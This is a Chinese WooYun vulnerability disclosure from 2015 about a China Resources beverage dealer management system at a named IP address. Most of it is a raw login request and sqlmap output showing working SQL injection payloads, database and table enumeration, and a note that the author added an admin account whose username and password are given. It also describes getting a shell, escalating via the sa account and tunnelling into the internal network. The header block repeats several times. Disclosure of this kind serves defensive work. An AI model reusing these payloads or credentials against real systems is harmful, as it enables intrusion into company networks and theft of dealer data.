华润某终端管理系统getshell已入内网(影响整个省经销商)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131389

漏洞标题：华润某终端管理系统getshell已入内网(影响整个省经销商)

漏洞作者： jianFen

提交时间：2015-08-03 19:57

修复时间：2015-09-18 18:00

公开时间：2015-09-18 18:00

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-03：细节已通知厂商并且等待厂商处理中
2015-08-04：厂商已经确认，细节仅向厂商公开
2015-08-14：细节向核心白帽子及相关领域专家公开
2015-08-24：细节向普通白帽子公开
2015-09-03：细节向实习白帽子公开
2015-09-18：细节向公众公开

简要描述：

- -

详细说明：

http://221.237.153.40:8081/
和华润控股合作的
首先后台存在注入

POST /Login.aspx HTTP/1.1
Host: 221.237.153.40:8081
Proxy-Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://221.237.153.40:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://221.237.153.40:8081/Login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi%2FtiZA6rA%3D%3D&__EVENTVALIDATION=%2FwEWBALMvPzODgLB2tiHDgKd%2B7qdDgKM54rGBswXH3t03%2BJD6BSESsrbFW2r6QCY&txtUser=11111&txtPwd=1111111&Button1=%E7%99%BB%E5%BD%95

sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
available databases [11]:
[*] ceshi
[*] master
[*] model
[*] msdb
[*] qdxt_xl
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xuehua_2014
[*] xuehua_2015
[*] ZDFY_275
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
Database: xuehua_2015
[95 tables]
+-------------------------+
| dbo.ERP_user            |
| dbo.LC                  |
| dbo.LCCD                |
| dbo.LCID                |
| dbo.LC_detail           |
| dbo.LC_roll             |
| dbo.Lxsb_cpmx           |
| dbo.Lxsb_fymx           |
| dbo.Lxsb_gdfy           |
| dbo.Lxsb_sxyjmx         |
| dbo.Table_1             |
| dbo.View_Jtchongxiao_ls |
| dbo.View_Sum_jhfy       |
| dbo.View_Sum_jhfy_new   |
| dbo.View_Sum_sjfy       |
| dbo.View_Sum_sjxl       |
| dbo.View_Sum_sxyj       |
| dbo.View_Sum_sxyj_yd    |
| dbo.View_Sum_ydxl       |
| dbo.View_XL_Dc          |
| dbo.View_cwsj           |
| dbo.View_fy             |
| dbo.View_fy_jxs         |
| dbo.View_fy_zfy         |
| dbo.View_fyjt           |
| dbo.View_hxlc           |
| dbo.View_hxpg           |
| dbo.View_jtcx           |
| dbo.View_lx_qr_db       |
| dbo.View_lxsb_jd        |
| dbo.View_sp             |
| dbo.View_sxyj           |
| dbo.View_sxyj_new       |
| dbo.View_tzmx           |
| dbo.View_tzmx_new       |
| dbo.View_tzmx_newxybh   |
| dbo.View_xl             |
| dbo.View_xl_new         |
| dbo.View_xsjk           |
| dbo.View_xsjk_hj        |
| dbo.View_xsjk_init      |
| dbo.View_ydsb           |
| dbo.XH_bz               |
| dbo.XH_cp               |
| dbo.XH_cpdc             |
| dbo.XH_dxy_qsy          |
| dbo.XH_fygs             |
| dbo.XH_fygs_ewcp        |
| dbo.XH_fygs_ewsxyj      |
| dbo.XH_fygs_fybd        |
| dbo.XH_fygs_gdsxyj      |
| dbo.XH_fygs_sxyj        |
| dbo.XH_fygsmx           |
| dbo.XH_fyhx             |
| dbo.XH_fykm             |
| dbo.XH_fysp             |
| dbo.XH_fytk             |
| dbo.XH_gc               |
| dbo.XH_gdcb             |
| dbo.XH_gdfy             |
| dbo.XH_gdfylb           |
| dbo.XH_glqy             |
| dbo.XH_gtfy             |
| dbo.XH_hxpg             |
| dbo.XH_jgtx             |
| dbo.XH_jgtx_ls          |
| dbo.XH_jhfy             |
| dbo.XH_jtls             |
| dbo.XH_lxsb             |
| dbo.XH_lxsbsh           |
| dbo.XH_mk               |
| dbo.XH_pfs              |
| dbo.XH_qyzt             |
| dbo.XH_sjfy             |
| dbo.XH_sjxl             |
| dbo.XH_sxyj             |
| dbo.XH_sxyj_yd          |
| dbo.XH_trxs             |
| dbo.XH_user             |
| dbo.XH_user_dq          |
| dbo.XH_user_qx          |
| dbo.XH_user_qy          |
| dbo.XH_xsdq             |
| dbo.XH_xsjk             |
| dbo.XH_xsjk_kj          |
| dbo.XH_xyyq             |
| dbo.XH_xzqy             |
| dbo.XH_ydxl             |
| dbo.XH_yyt              |
| dbo.XH_zd               |
| dbo.XH_zdgk             |
| dbo.XH_zdlx             |
| dbo.XH_zm               |
| dbo.dljl                |
| dbo.qdxtidtzmx          |
+-------------------------+
dbo.XH_user  表里有几千个经销商和包括admin的密码 我登入admin添加了一个账号作为测试
为了方便审核 jianfen/jianfen97

后台功能

getshell :

web.config
sa权限提权成功

reduh转发入内网

漏洞证明：

修复方案：

过滤注入

版权声明：转载请注明来源 jianFen@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-04 17:59

厂商回复：

感谢提交

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131389

漏洞标题：华润某终端管理系统getshell已入内网(影响整个省经销商)

相关厂商：华润饮料(控股)有限公司

漏洞作者： jianFen

提交时间：2015-08-03 19:57

修复时间：2015-09-18 18:00

公开时间：2015-09-18 18:00

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jianFen@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131389

漏洞标题：华润某终端管理系统getshell已入内网(影响整个省经销商)

相关厂商：华润饮料(控股)有限公司

漏洞作者： jianFen

提交时间：2015-08-03 19:57

修复时间：2015-09-18 18:00

公开时间：2015-09-18 18:00

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0131389"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jianFen@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：